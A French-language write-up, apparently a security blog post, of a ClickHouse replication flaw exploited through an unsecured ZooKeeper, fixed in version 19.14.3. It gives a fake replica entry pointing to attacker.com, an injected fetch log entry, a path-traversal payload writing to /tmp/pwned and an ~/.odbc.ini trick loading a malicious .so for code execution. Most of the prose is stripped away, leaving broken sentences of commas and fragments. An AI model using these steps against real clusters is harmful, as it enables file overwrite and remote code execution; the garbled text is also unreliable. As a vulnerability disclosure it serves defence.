Clever Geek Handbook

Pourquoi garder les cages du zoo fermées



Cet article sera une histoire sur une vulnérabilité trÚs courante dans le protocole de réplication ClickHouse, et il montrera également comment vous pouvez étendre le plan d'attaque.



ClickHouse — , . ClickHouse Apache ZooKeeper (ZK) .



ZK , ZK , Kafka, Hadoop, ClickHouse .



ZooKeeper

0day Java , , ZooKeeper, ClickHouse.



ClickHouse DDL, ZK — /clickhouse/task_queue/ddl.



/clickhouse/task_queue/ddl/query-0001 :



version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']


host1 host2 test . DDL CREATE/ALTER/DROP.



? ?



ClickHouse , ZK , . (ZK , chXX — , foobar — ):



CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;


columns metadata.



/clickhouse/tables/01/foobar/replicas/chXX/hosts:



host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http


? , (TCP/9009) chXX-address firewall . ?



ZK, /clickhouse/tables/01-01/foobar/replicas/chXX host.



/clickhouse/tables/01–01/foobar/replicas/attacker/host:



host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http


, , — ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX , , ):



format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2


source_replica — , , block_id — , get — "get block" ( ).



, , ( , HTTP). attacker.com :



POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX


XXX — . ClickHouse HTTP. , , ZooKeeper, , .



, , .







, , , , . , .



/var/lib/clickhouse ( - ):



flags — , ;

tmp — ;

user_files — (INTO OUTFILE );

metadata — sql ;

preprocessed_configs — /etc/clickhouse-server;

data — , ( /var/lib/clickhouse/data/default).



. — . foobar, , :



action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2


- .



file_name WriteBufferFromFile. , clickhouse. , , ( ):



\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper


../../../../../../../../../tmp/pwned /tmp/pwned hellofromzookeeper.



(RCE).



RCE



ClickHouse clickhouse -. XML, , /var/lib/clickhouse/preprocessed_configs. . /etc/clickhouse-server , . ClickHouse -, — . ClickHouse, , root.



ODBC RCE



clickhouse, /nonexistent. , , /nonexistent clickhouse (! . ).



ClickHouse ODBC . ODBC (.so). ClickHouse , odbc-bridge, . , , ?



~/.odbc.ini :



[lalala]
Driver=/var/lib/clickhouse/user_files/test.so


SELECT * FROM odbc('DSN=lalala', 'test', 'test'); test.so RCE ( buglloc ).



ClickHouse 19.14.3. ClickHouse ZooKeepers!



More articles:


All Articles